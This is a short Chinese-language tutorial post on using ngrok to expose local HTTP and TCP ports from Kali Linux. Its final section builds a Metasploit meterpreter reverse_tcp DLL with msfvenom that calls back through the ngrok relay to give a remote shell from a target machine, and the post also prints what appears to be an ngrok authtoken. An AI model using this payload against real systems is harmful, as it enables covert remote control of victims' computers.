实例讲解
0x00.
demon之前发了一篇Ngrok&MSF(内网穿)的文章,由于没时间,现在正好有时间过来测试下。
感谢demon的耐心教导。
ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。
Ngrok的下载地址:https://ngrok.com/download
下面以我的Kali Linux 为例子,下载ngrok。
解压后得出,ngrok包

0X01.
我选择将ngrok复制到/bin

0X02.HTTP

1.安装你的token
去ngrok的官网找到你的token
ngrok authtoken 6RBm_2CfWq3xAJ3XVK
根据官方文档 使用http的时候 使用ngrok http 80(将本地80端口映射到ngrok外网),比如我们本机开启了80端口(apache)需要映射到外网。
开启apache服务80端口


本机中的localhost

图中可以看到,已将本机的80端口映射到ngrok.io中
ngrok http 80

我们可以来验证下: http://xxxx571a.ngrok.io中是否有映射。


0x03 TCP
配置完了Ngrok 上个试了下http,我再来试试TCP
我们使用 ngrok 帮助参数 tcp

ngrok tcp 6666 将本机的6666映射到ngrok的外网中。


0x04 Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(ip填写对应的ngrok对应的ip或者对应的ngrok对应的域名地址也可以) LPORT=(端口填写对应的ngrok的映射的端口) -f dll > /opt/x.dll
放入目标机子上得到反弹

总结:
- 利用ngrok,我们可以实现内网穿透。
